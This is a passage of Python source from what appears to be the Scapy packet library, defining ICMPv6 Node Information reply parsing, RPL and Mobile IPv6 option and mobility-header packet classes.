2593_nireply_code = {0: "Successful Reply", 

2594 1: "Response Refusal", 

2595 3: "Unknown query type"} 

2596 

2597_nireply_flags = {1: "Reply set incomplete", 

2598 2: "All unicast addresses", 

2599 4: "IPv4 addresses", 

2600 8: "Link-local addresses", 

2601 16: "Site-local addresses", 

2602 32: "Global addresses"} 

2603 

2604# Internal repr is one of those : 

2605# (0, "some string") : unknown qtype value are mapped to that one 

2606# (3, [ (ttl, ip6), ... ]) 

2607# (4, [ (ttl, ip4), ... ]) 

2608# (2, [ttl, dns_names]) : dns_names is one string that contains 

2609# all the DNS names. Internally it is kept ready to be sent 

2610# (undissected). i2repr() decode it for user. This is to 

2611# make build after dissection bijective. 

2612# 

2613# I also merged getfield() and m2i(), and addfield() and i2m(). 

2614 

2615 

2616class NIReplyDataField(StrField): 

2617 

2618 def i2h(self, pkt, x): 

2619 if x is None: 

2620 return x 

2621 t, val = x 

2622 if t == 2: 

2623 ttl, dnsnames = val 

2624 val = [ttl] + dnsrepr2names(dnsnames) 

2625 return val 

2626 

2627 def h2i(self, pkt, x): 

2628 qtype = 0 # We will decode it as string if not 

2629 # overridden through 'qtype' in pkt 

2630 

2631 # No user hint, let's use 'qtype' value for that purpose 

2632 if not isinstance(x, tuple): 

2633 if pkt is not None: 

2634 qtype = pkt.qtype 

2635 else: 

2636 qtype = x[0] 

2637 x = x[1] 

2638 

2639 # From that point on, x is the value (second element of the tuple) 

2640 

2641 if qtype == 2: # DNS name 

2642 if isinstance(x, (str, bytes)): # listify the string 

2643 x = [x] 

2644 if isinstance(x, list): 

2645 x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501 

2646 if x and isinstance(x[0], int): 

2647 ttl = x[0] 

2648 names = x[1:] 

2649 else: 

2650 ttl = 0 

2651 names = x 

2652 return (2, [ttl, names2dnsrepr(names)]) 

2653 

2654 elif qtype in [3, 4]: # IPv4 or IPv6 addr 

2655 if not isinstance(x, list): 

2656 x = [x] # User directly provided an IP, instead of list 

2657 

2658 def fixvalue(x): 

2659 # List elements are not tuples, user probably 

2660 # omitted ttl value : we will use 0 instead 

2661 if not isinstance(x, tuple): 

2662 x = (0, x) 

2663 # Decode bytes 

2664 if isinstance(x[1], bytes): 

2665 x = (x[0], x[1].decode()) 

2666 return x 

2667 

2668 return (qtype, [fixvalue(d) for d in x]) 

2669 

2670 return (qtype, x) 

2671 

2672 def addfield(self, pkt, s, val): 

2673 t, tmp = val 

2674 if tmp is None: 

2675 tmp = b"" 

2676 if t == 2: 

2677 ttl, dnsstr = tmp 

2678 return s + struct.pack("!I", ttl) + dnsstr 

2679 elif t == 3: 

2680 return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501 

2681 elif t == 4: 

2682 return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501 

2683 else: 

2684 return s + tmp 

2685 

2686 def getfield(self, pkt, s): 

2687 code = getattr(pkt, "code") 

2688 if code != 0: 

2689 return s, (0, b"") 

2690 

2691 qtype = getattr(pkt, "qtype") 

2692 if qtype == 0: # NOOP 

2693 return s, (0, b"") 

2694 

2695 elif qtype == 2: 

2696 if len(s) < 4: 

2697 return s, (0, b"") 

2698 ttl = struct.unpack("!I", s[:4])[0] 

2699 return b"", (2, [ttl, s[4:]]) 

2700 

2701 elif qtype == 3: # IPv6 addresses with TTLs 

2702 # XXX TODO : get the real length 

2703 res = [] 

2704 while len(s) >= 20: # 4 + 16 

2705 ttl = struct.unpack("!I", s[:4])[0] 

2706 ip = inet_ntop(socket.AF_INET6, s[4:20]) 

2707 res.append((ttl, ip)) 

2708 s = s[20:] 

2709 return s, (3, res) 

2710 

2711 elif qtype == 4: # IPv4 addresses with TTLs 

2712 # XXX TODO : get the real length 

2713 res = [] 

2714 while len(s) >= 8: # 4 + 4 

2715 ttl = struct.unpack("!I", s[:4])[0] 

2716 ip = inet_ntop(socket.AF_INET, s[4:8]) 

2717 res.append((ttl, ip)) 

2718 s = s[8:] 

2719 return s, (4, res) 

2720 else: 

2721 # XXX TODO : implement me and deal with real length 

2722 return b"", (0, s) 

2723 

2724 def i2repr(self, pkt, x): 

2725 if x is None: 

2726 return "[]" 

2727 

2728 if isinstance(x, tuple) and len(x) == 2: 

2729 t, val = x 

2730 if t == 2: # DNS names 

2731 ttl, tmp_len = val 

2732 tmp_len = dnsrepr2names(tmp_len) 

2733 names_list = (plain_str(name) for name in tmp_len) 

2734 return "ttl:%d %s" % (ttl, ",".join(names_list)) 

2735 elif t == 3 or t == 4: 

2736 return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501 

2737 return repr(val) 

2738 return repr(x) # XXX should not happen 

2739 

2740# By default, sent responses have code set to 0 (successful) 

2741 

2742 

2743class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6): 

2744 name = "ICMPv6 Node Information Reply - NOOP Reply" 

2745 fields_desc = [ByteEnumField("type", 140, icmp6types), 

2746 ByteEnumField("code", 0, _nireply_code), 

2747 XShortField("cksum", None), 

2748 ShortEnumField("qtype", 0, icmp6_niqtypes), 

2749 BitField("unused", 0, 10), 

2750 FlagsField("flags", 0, 6, "TACLSG"), 

2751 NonceField("nonce", None), 

2752 NIReplyDataField("data", None)] 

2753 

2754 

2755class ICMPv6NIReplyName(ICMPv6NIReplyNOOP): 

2756 name = "ICMPv6 Node Information Reply - Node Names" 

2757 qtype = 2 

2758 

2759 

2760class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP): 

2761 name = "ICMPv6 Node Information Reply - IPv6 addresses" 

2762 qtype = 3 

2763 

2764 

2765class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP): 

2766 name = "ICMPv6 Node Information Reply - IPv4 addresses" 

2767 qtype = 4 

2768 

2769 

2770class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP): 

2771 name = "ICMPv6 Node Information Reply - Responder refuses to supply answer" 

2772 code = 1 

2773 

2774 

2775class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP): 

2776 name = "ICMPv6 Node Information Reply - Qtype unknown to the responder" 

2777 code = 2 

2778 

2779 

2780def _niquery_guesser(p): 

2781 cls = conf.raw_layer 

2782 type = orb(p[0]) 

2783 if type == 139: # Node Info Query specific stuff 

2784 if len(p) > 6: 

2785 qtype, = struct.unpack("!H", p[4:6]) 

2786 cls = {0: ICMPv6NIQueryNOOP, 

2787 2: ICMPv6NIQueryName, 

2788 3: ICMPv6NIQueryIPv6, 

2789 4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer) 

2790 elif type == 140: # Node Info Reply specific stuff 

2791 code = orb(p[1]) 

2792 if code == 0: 

2793 if len(p) > 6: 

2794 qtype, = struct.unpack("!H", p[4:6]) 

2795 cls = {2: ICMPv6NIReplyName, 

2796 3: ICMPv6NIReplyIPv6, 

2797 4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP) 

2798 elif code == 1: 

2799 cls = ICMPv6NIReplyRefuse 

2800 elif code == 2: 

2801 cls = ICMPv6NIReplyUnknown 

2802 return cls 

2803 

2804 

2805############################################################################# 

2806############################################################################# 

2807# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) # 

2808############################################################################# 

2809############################################################################# 

2810 

2811# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes 

2812rplcodes = {0: "DIS", 

2813 1: "DIO", 

2814 2: "DAO", 

2815 3: "DAO-ACK", 

2816 # 4: "P2P-DRO", 

2817 # 5: "P2P-DRO-ACK", 

2818 # 6: "Measurement", 

2819 7: "DCO", 

2820 8: "DCO-ACK"} 

2821 

2822 

2823class ICMPv6RPL(_ICMPv6): # RFC 6550 

2824 name = 'RPL' 

2825 fields_desc = [ByteEnumField("type", 155, icmp6types), 

2826 ByteEnumField("code", 0, rplcodes), 

2827 XShortField("cksum", None)] 

2828 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}} 

2829 

2830 

2831############################################################################# 

2832############################################################################# 

2833# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) # 

2834############################################################################# 

2835############################################################################# 

2836 

2837# Mobile IPv6 ICMPv6 related classes 

2838 

2839class ICMPv6HAADRequest(_ICMPv6): 

2840 name = 'ICMPv6 Home Agent Address Discovery Request' 

2841 fields_desc = [ByteEnumField("type", 144, icmp6types), 

2842 ByteField("code", 0), 

2843 XShortField("cksum", None), 

2844 XShortField("id", None), 

2845 BitEnumField("R", 1, 1, {1: 'MR'}), 

2846 XBitField("res", 0, 15)] 

2847 

2848 def hashret(self): 

2849 return struct.pack("!H", self.id) + self.payload.hashret() 

2850 

2851 

2852class ICMPv6HAADReply(_ICMPv6): 

2853 name = 'ICMPv6 Home Agent Address Discovery Reply' 

2854 fields_desc = [ByteEnumField("type", 145, icmp6types), 

2855 ByteField("code", 0), 

2856 XShortField("cksum", None), 

2857 XShortField("id", None), 

2858 BitEnumField("R", 1, 1, {1: 'MR'}), 

2859 XBitField("res", 0, 15), 

2860 IP6ListField('addresses', None)] 

2861 

2862 def hashret(self): 

2863 return struct.pack("!H", self.id) + self.payload.hashret() 

2864 

2865 def answers(self, other): 

2866 if not isinstance(other, ICMPv6HAADRequest): 

2867 return 0 

2868 return self.id == other.id 

2869 

2870 

2871class ICMPv6MPSol(_ICMPv6): 

2872 name = 'ICMPv6 Mobile Prefix Solicitation' 

2873 fields_desc = [ByteEnumField("type", 146, icmp6types), 

2874 ByteField("code", 0), 

2875 XShortField("cksum", None), 

2876 XShortField("id", None), 

2877 XShortField("res", 0)] 

2878 

2879 def _hashret(self): 

2880 return struct.pack("!H", self.id) 

2881 

2882 

2883class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6): 

2884 name = 'ICMPv6 Mobile Prefix Advertisement' 

2885 fields_desc = [ByteEnumField("type", 147, icmp6types), 

2886 ByteField("code", 0), 

2887 XShortField("cksum", None), 

2888 XShortField("id", None), 

2889 BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}), 

2890 XBitField("res", 0, 14)] 

2891 

2892 def hashret(self): 

2893 return struct.pack("!H", self.id) 

2894 

2895 def answers(self, other): 

2896 return isinstance(other, ICMPv6MPSol) 

2897 

2898# Mobile IPv6 Options classes 

2899 

2900 

2901_mobopttypes = {2: "Binding Refresh Advice", 

2902 3: "Alternate Care-of Address", 

2903 4: "Nonce Indices", 

2904 5: "Binding Authorization Data", 

2905 6: "Mobile Network Prefix (RFC3963)", 

2906 7: "Link-Layer Address (RFC4068)", 

2907 8: "Mobile Node Identifier (RFC4283)", 

2908 9: "Mobility Message Authentication (RFC4285)", 

2909 10: "Replay Protection (RFC4285)", 

2910 11: "CGA Parameters Request (RFC4866)", 

2911 12: "CGA Parameters (RFC4866)", 

2912 13: "Signature (RFC4866)", 

2913 14: "Home Keygen Token (RFC4866)", 

2914 15: "Care-of Test Init (RFC4866)", 

2915 16: "Care-of Test (RFC4866)"} 

2916 

2917 

2918class _MIP6OptAlign(Packet): 

2919 """ Mobile IPv6 options have alignment requirements of the form x*n+y. 

2920 This class is inherited by all MIPv6 options to help in computing the 

2921 required Padding for that option, i.e. the need for a Pad1 or PadN 

2922 option before it. They only need to provide x and y as class 

2923 parameters. (x=0 and y=0 are used when no alignment is required)""" 

2924 

2925 __slots__ = ["x", "y"] 

2926 

2927 def alignment_delta(self, curpos): 

2928 x = self.x 

2929 y = self.y 

2930 if x == 0 and y == 0: 

2931 return 0 

2932 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

2933 return delta 

2934 

2935 def extract_padding(self, p): 

2936 return b"", p 

2937 

2938 

2939class MIP6OptBRAdvice(_MIP6OptAlign): 

2940 name = 'Mobile IPv6 Option - Binding Refresh Advice' 

2941 fields_desc = [ByteEnumField('otype', 2, _mobopttypes), 

2942 ByteField('olen', 2), 

2943 ShortField('rinter', 0)] 

2944 x = 2 

2945 y = 0 # alignment requirement: 2n 

2946 

2947 

2948class MIP6OptAltCoA(_MIP6OptAlign): 

2949 name = 'MIPv6 Option - Alternate Care-of Address' 

2950 fields_desc = [ByteEnumField('otype', 3, _mobopttypes), 

2951 ByteField('olen', 16), 

2952 IP6Field("acoa", "::")] 

2953 x = 8 

2954 y = 6 # alignment requirement: 8n+6 

2955 

2956 

2957class MIP6OptNonceIndices(_MIP6OptAlign): 

2958 name = 'MIPv6 Option - Nonce Indices' 

2959 fields_desc = [ByteEnumField('otype', 4, _mobopttypes), 

2960 ByteField('olen', 16), 

2961 ShortField('hni', 0), 

2962 ShortField('coni', 0)] 

2963 x = 2 

2964 y = 0 # alignment requirement: 2n 

2965 

2966 

2967class MIP6OptBindingAuthData(_MIP6OptAlign): 

2968 name = 'MIPv6 Option - Binding Authorization Data' 

2969 fields_desc = [ByteEnumField('otype', 5, _mobopttypes), 

2970 ByteField('olen', 16), 

2971 BitField('authenticator', 0, 96)] 

2972 x = 8 

2973 y = 2 # alignment requirement: 8n+2 

2974 

2975 

2976class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963 

2977 name = 'NEMO Option - Mobile Network Prefix' 

2978 fields_desc = [ByteEnumField("otype", 6, _mobopttypes), 

2979 ByteField("olen", 18), 

2980 ByteField("reserved", 0), 

2981 ByteField("plen", 64), 

2982 IP6Field("prefix", "::")] 

2983 x = 8 

2984 y = 4 # alignment requirement: 8n+4 

2985 

2986 

2987class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068 

2988 name = "MIPv6 Option - Link-Layer Address (MH-LLA)" 

2989 fields_desc = [ByteEnumField("otype", 7, _mobopttypes), 

2990 ByteField("olen", 7), 

2991 ByteEnumField("ocode", 2, _rfc4068_lla_optcode), 

2992 ByteField("pad", 0), 

2993 MACField("lla", ETHER_ANY)] # Only support ethernet 

2994 x = 0 

2995 y = 0 # alignment requirement: none 

2996 

2997 

2998class MIP6OptMNID(_MIP6OptAlign): # RFC 4283 

2999 name = "MIPv6 Option - Mobile Node Identifier" 

3000 fields_desc = [ByteEnumField("otype", 8, _mobopttypes), 

3001 FieldLenField("olen", None, length_of="id", fmt="B", 

3002 adjust=lambda pkt, x: x + 1), 

3003 ByteEnumField("subtype", 1, {1: "NAI"}), 

3004 StrLenField("id", "", 

3005 length_from=lambda pkt: pkt.olen - 1)] 

3006 x = 0 

3007 y = 0 # alignment requirement: none 

3008 

3009# We only support decoding and basic build. Automatic HMAC computation is 

3010# too much work for our current needs. It is left to the user (I mean ... 

3011# you). --arno 

3012 

3013 

3014class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5) 

3015 name = "MIPv6 Option - Mobility Message Authentication" 

3016 fields_desc = [ByteEnumField("otype", 9, _mobopttypes), 

3017 FieldLenField("olen", None, length_of="authdata", fmt="B", 

3018 adjust=lambda pkt, x: x + 5), 

3019 ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501 

3020 2: "MN-AAA authentication mobility option"}), # noqa: E501 

3021 IntField("mspi", None), 

3022 StrLenField("authdata", "A" * 12, 

3023 length_from=lambda pkt: pkt.olen - 5)] 

3024 x = 4 

3025 y = 1 # alignment requirement: 4n+1 

3026 

3027# Extracted from RFC 1305 (NTP) : 

3028# NTP timestamps are represented as a 64-bit unsigned fixed-point number, 

3029# in seconds relative to 0h on 1 January 1900. The integer part is in the 

3030# first 32 bits and the fraction part in the last 32 bits. 

3031 

3032 

3033class NTPTimestampField(LongField): 

3034 def i2repr(self, pkt, x): 

3035 if x < ((50 * 31536000) << 32): 

3036 return "Some date a few decades ago (%d)" % x 

3037 

3038 # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to 

3039 # January 1st 1970 : 

3040 delta = -2209075761 

3041 i = int(x >> 32) 

3042 j = float(x & 0xffffffff) * 2.0**-32 

3043 res = i + j + delta 

3044 t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res)) 

3045 

3046 return "%s (%d)" % (t, x) 

3047 

3048 

3049class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6) 

3050 name = "MIPv6 option - Replay Protection" 

3051 fields_desc = [ByteEnumField("otype", 10, _mobopttypes), 

3052 ByteField("olen", 8), 

3053 NTPTimestampField("timestamp", 0)] 

3054 x = 8 

3055 y = 2 # alignment requirement: 8n+2 

3056 

3057 

3058class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6) 

3059 name = "MIPv6 option - CGA Parameters Request" 

3060 fields_desc = [ByteEnumField("otype", 11, _mobopttypes), 

3061 ByteField("olen", 0)] 

3062 x = 0 

3063 y = 0 # alignment requirement: none 

3064 

3065# XXX TODO: deal with CGA param fragmentation and build of defragmented 

3066# XXX version. Passing of a big CGAParam structure should be 

3067# XXX simplified. Make it hold packets, by the way --arno 

3068 

3069 

3070class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1) 

3071 name = "MIPv6 option - CGA Parameters" 

3072 fields_desc = [ByteEnumField("otype", 12, _mobopttypes), 

3073 FieldLenField("olen", None, length_of="cgaparams", fmt="B"), 

3074 StrLenField("cgaparams", "", 

3075 length_from=lambda pkt: pkt.olen)] 

3076 x = 0 

3077 y = 0 # alignment requirement: none 

3078 

3079 

3080class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2) 

3081 name = "MIPv6 option - Signature" 

3082 fields_desc = [ByteEnumField("otype", 13, _mobopttypes), 

3083 FieldLenField("olen", None, length_of="sig", fmt="B"), 

3084 StrLenField("sig", "", 

3085 length_from=lambda pkt: pkt.olen)] 

3086 x = 0 

3087 y = 0 # alignment requirement: none 

3088 

3089 

3090class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3) 

3091 name = "MIPv6 option - Home Keygen Token" 

3092 fields_desc = [ByteEnumField("otype", 14, _mobopttypes), 

3093 FieldLenField("olen", None, length_of="hkt", fmt="B"), 

3094 StrLenField("hkt", "", 

3095 length_from=lambda pkt: pkt.olen)] 

3096 x = 0 

3097 y = 0 # alignment requirement: none 

3098 

3099 

3100class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4) 

3101 name = "MIPv6 option - Care-of Test Init" 

3102 fields_desc = [ByteEnumField("otype", 15, _mobopttypes), 

3103 ByteField("olen", 0)] 

3104 x = 0 

3105 y = 0 # alignment requirement: none 

3106 

3107 

3108class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 5.5) 

3109 name = "MIPv6 option - Care-of Test" 

3110 fields_desc = [ByteEnumField("otype", 16, _mobopttypes), 

3111 FieldLenField("olen", None, length_of="cokt", fmt="B"), 

3112 StrLenField("cokt", b'\x00' * 8, 

3113 length_from=lambda pkt: pkt.olen)] 

3114 x = 0 

3115 y = 0 # alignment requirement: none 

3116 

3117 

3118class MIP6OptUnknown(_MIP6OptAlign): 

3119 name = 'Scapy6 - Unknown Mobility Option' 

3120 fields_desc = [ByteEnumField("otype", 6, _mobopttypes), 

3121 FieldLenField("olen", None, length_of="odata", fmt="B"), 

3122 StrLenField("odata", "", 

3123 length_from=lambda pkt: pkt.olen)] 

3124 x = 0 

3125 y = 0 # alignment requirement: none 

3126 

3127 @classmethod 

3128 def dispatch_hook(cls, _pkt=None, *_, **kargs): 

3129 if _pkt: 

3130 o = orb(_pkt[0]) # Option type 

3131 if o in moboptcls: 

3132 return moboptcls[o] 

3133 return cls 

3134 

3135 

3136moboptcls = {0: Pad1, 

3137 1: PadN, 

3138 2: MIP6OptBRAdvice, 

3139 3: MIP6OptAltCoA, 

3140 4: MIP6OptNonceIndices, 

3141 5: MIP6OptBindingAuthData, 

3142 6: MIP6OptMobNetPrefix, 

3143 7: MIP6OptLLAddr, 

3144 8: MIP6OptMNID, 

3145 9: MIP6OptMsgAuth, 

3146 10: MIP6OptReplayProtection, 

3147 11: MIP6OptCGAParamsReq, 

3148 12: MIP6OptCGAParams, 

3149 13: MIP6OptSignature, 

3150 14: MIP6OptHomeKeygenToken, 

3151 15: MIP6OptCareOfTestInit, 

3152 16: MIP6OptCareOfTest} 

3153 

3154 

3155# Main Mobile IPv6 Classes 

3156 

3157mhtypes = {0: 'BRR', 

3158 1: 'HoTI', 

3159 2: 'CoTI', 

3160 3: 'HoT', 

3161 4: 'CoT', 

3162 5: 'BU', 

3163 6: 'BA', 

3164 7: 'BE', 

3165 8: 'Fast BU', 

3166 9: 'Fast BA', 

3167 10: 'Fast NA'} 

3168 

3169# From http://www.iana.org/assignments/mobility-parameters 

3170bastatus = {0: 'Binding Update accepted', 

3171 1: 'Accepted but prefix discovery necessary', 

3172 128: 'Reason unspecified', 

3173 129: 'Administratively prohibited', 

3174 130: 'Insufficient resources', 

3175 131: 'Home registration not supported', 

3176 132: 'Not home subnet', 

3177 133: 'Not home agent for this mobile node', 

3178 134: 'Duplicate Address Detection failed', 

3179 135: 'Sequence number out of window', 

3180 136: 'Expired home nonce index', 

3181 137: 'Expired care-of nonce index', 

3182 138: 'Expired nonces', 

3183 139: 'Registration type change disallowed', 

3184 140: 'Mobile Router Operation not permitted', 

3185 141: 'Invalid Prefix', 

3186 142: 'Not Authorized for Prefix', 

3187 143: 'Forwarding Setup failed (prefixes missing)', 

3188 144: 'MIPV6-ID-MISMATCH', 

3189 145: 'MIPV6-MESG-ID-REQD', 

3190 146: 'MIPV6-AUTH-FAIL', 

3191 147: 'Permanent home keygen token unavailable', 

3192 148: 'CGA and signature verification failed', 

3193 149: 'Permanent home keygen token exists', 

3194 150: 'Non-null home nonce index expected'} 

3195 

3196 

3197class _MobilityHeader(Packet): 

3198 name = 'Dummy IPv6 Mobility Header' 

3199 overload_fields = {IPv6: {"nh": 135}} 

3200 

3201 def post_build(self, p, pay): 

3202 p += pay 

3203 tmp_len = self.len 

3204 if self.len is None: 

3205 tmp_len = (len(p) - 8) // 8 

3206 p = p[:1] + struct.pack("B", tmp_len) + p[2:] 

3207 if self.cksum is None: 

3208 cksum = in6_chksum(135, self.underlayer, p) 

3209 else: 

3210 cksum = self.cksum 

3211 p = p[:4] + struct.pack("!H", cksum) + p[6:] 

3212 return p 

3213 

3214 

3215class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg 

3216 name = "IPv6 Mobility Header - Generic Message" 

3217 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3218 ByteField("len", None), 

3219 ByteEnumField("mhtype", None, mhtypes), 

3220 ByteField("res", None), 

3221 XShortField("cksum", None), 

3222 StrLenField("msg", b"\x00" * 2, 

3223 length_from=lambda pkt: 8 * pkt.len - 6)] 

3224 

3225 

3226class MIP6MH_BRR(_MobilityHeader): 

3227 name = "IPv6 Mobility Header - Binding Refresh Request" 

3228 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3229 ByteField("len", None), 

3230 ByteEnumField("mhtype", 0, mhtypes), 

3231 ByteField("res", None), 

3232 XShortField("cksum", None), 

3233 ShortField("res2", None), 

3234 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3235 _OptionsField("options", [], MIP6OptUnknown, 8, 

3236 length_from=lambda pkt: 8 * pkt.len)] 

3237 overload_fields = {IPv6: {"nh": 135}} 

3238 

3239 def hashret(self): 

3240 # Hack: BRR, BU and BA have the same hashret that returns the same 

3241 # value b"\x00\x08\x09" (concatenation of mhtypes). This is 

3242 # because we need match BA with BU and BU with BRR. --arno 

3243 return b"\x00\x08\x09" 

3244 

3245 

3246class MIP6MH_HoTI(_MobilityHeader): 

3247 name = "IPv6 Mobility Header - Home Test Init" 

3248 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3249 ByteField("len", None), 

3250 ByteEnumField("mhtype", 1, mhtypes), 

3251 ByteField("res", None), 

3252 XShortField("cksum", None), 

3253 StrFixedLenField("reserved", b"\x00" * 2, 2), 

3254 StrFixedLenField("cookie", b"\x00" * 8, 8), 

3255 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3256 _OptionsField("options", [], MIP6OptUnknown, 16, 

3257 length_from=lambda pkt: 8 * (pkt.len - 1))] 

3258 overload_fields = {IPv6: {"nh": 135}} 

3259 

3260 def hashret(self): 

3261 return bytes_encode(self.cookie) 

3262 

3263 

3264class MIP6MH_CoTI(MIP6MH_HoTI): 

3265 name = "IPv6 Mobility Header - Care-of Test Init" 

3266 mhtype = 2 

3267 

3268 def hashret(self): 

3269 return bytes_encode(self.cookie) 

3270 

3271 

3272class MIP6MH_HoT(_MobilityHeader): 

3273 name = "IPv6 Mobility Header - Home Test" 

3274 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3275 ByteField("len", None), 

3276 ByteEnumField("mhtype", 3, mhtypes), 

3277 ByteField("res", None), 

3278 XShortField("cksum", None), 

3279 ShortField("index", None), 

3280 StrFixedLenField("cookie", b"\x00" * 8, 8), 

3281 StrFixedLenField("token", b"\x00" * 8, 8), 

3282 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3283 _OptionsField("options", [], MIP6OptUnknown, 24, 

3284 length_from=lambda pkt: 8 * (pkt.len - 2))] 

3285 overload_fields = {IPv6: {"nh": 135}} 

3286 

3287 def hashret(self): 

3288 return bytes_encode(self.cookie) 

3289 

3290 def answers(self, other): 

3291 if (isinstance(other, MIP6MH_HoTI) and 

3292 self.cookie == other.cookie): 

3293 return 1 

3294 return 0 

3295 

3296 

3297class MIP6MH_CoT(MIP6MH_HoT): 

3298 name = "IPv6 Mobility Header - Care-of Test" 

3299 mhtype = 4 

3300 

3301 def hashret(self): 

3302 return bytes_encode(self.cookie) 

3303 

3304 def answers(self, other): 

3305 if (isinstance(other, MIP6MH_CoTI) and 

3306 self.cookie == other.cookie): 

3307 return 1 

3308 return 0 

3309 

3310 

3311class LifetimeField(ShortField): 

3312 def i2repr(self, pkt, x): 

3313 return "%d sec" % (4 * x) 

3314 

3315 

3316class MIP6MH_BU(_MobilityHeader): 

3317 name = "IPv6 Mobility Header - Binding Update" 

3318 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3319 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 

3320 ByteEnumField("mhtype", 5, mhtypes), 

3321 ByteField("res", None), 

3322 XShortField("cksum", None), 

3323 XShortField("seq", None), # TODO: ShortNonceField 

3324 FlagsField("flags", "KHA", 7, "PRMKLHA"), 

3325 XBitField("reserved", 0, 9), 

3326 LifetimeField("mhtime", 3), # unit == 4 seconds 

3327 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3328 _OptionsField("options", [], MIP6OptUnknown, 12, 

3329 length_from=lambda pkt: 8 * pkt.len - 4)] 

3330 overload_fields = {IPv6: {"nh": 135}} 

3331 

3332 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 

3333 return b"\x00\x08\x09" 

3334 

3335 def answers(self, other): 

3336 if isinstance(other, MIP6MH_BRR): 

3337 return 1 

3338 return 0 

3339 

3340 

3341class MIP6MH_BA(_MobilityHeader): 

3342 name = "IPv6 Mobility Header - Binding ACK" 

3343 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3344 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 

3345 ByteEnumField("mhtype", 6, mhtypes), 

3346 ByteField("res", None), 

3347 XShortField("cksum", None), 

3348 ByteEnumField("status", 0, bastatus), 

3349 FlagsField("flags", "K", 3, "PRK"), 

3350 XBitField("res2", None, 5), 

3351 XShortField("seq", None), # TODO: ShortNonceField 

3352 XShortField("mhtime", 0), # unit == 4 seconds 

3353 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3354 _OptionsField("options", [], MIP6OptUnknown, 12, 

3355 length_from=lambda pkt: 8 * pkt.len - 4)] 

3356 overload_fields = {IPv6: {"nh": 135}} 

3357 

3358 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 

3359 return b"\x00\x08\x09" 

3360 

3361 def answers(self, other): 

3362 if (isinstance(other, MIP6MH_BU) and 

3363 other.mhtype == 5 and 

3364 self.mhtype == 6 and 

3365 other.flags & 0x1 and # Ack request flags is set 

3366 self.seq == other.seq): 

3367 return 1 

3368 return 0 

3369 

3370 

3371_bestatus = {1: 'Unknown binding for Home Address destination option', 

3372 2: 'Unrecognized MH Type value'} 

3373 

3374# TODO: match Binding Error to its stimulus 

3375 

3376 

3377class MIP6MH_BE(_MobilityHeader): 

3378 name = "IPv6 Mobility Header - Binding Error" 

3379 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3380 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 

3381 ByteEnumField("mhtype", 7, mhtypes), 

3382 ByteField("res", 0), 

3383 XShortField("cksum", None), 

3384 ByteEnumField("status", 0, _bestatus), 

3385 ByteField("reserved", 0), 

3386 IP6Field("ha", "::"), 

3387 _OptionsField("options", [], MIP6OptUnknown, 24, 

3388 length_from=lambda pkt: 8 * (pkt.len - 2))] 

3389 overload_fields = {IPv6: {"nh": 135}} 

3390 

3391 

3392_mip6_mhtype2cls = {0: MIP6MH_BRR, 

3393 1: MIP6MH_HoTI, 

3394 2: MIP6MH_CoTI, 

3395 3: MIP6MH_HoT, 

3396 4: MIP6MH_CoT, 

3397 5: MIP6MH_BU, 

3398 6: MIP6MH_BA, 

3399 7: MIP6MH_BE} 

3400 

3401 

3402############################################################################# 

3403############################################################################# 

3404# Traceroute6 # 

3405############################################################################# 

3406############################################################################# 

3407 

3408class AS_resolver6(AS_resolver_riswhois): 

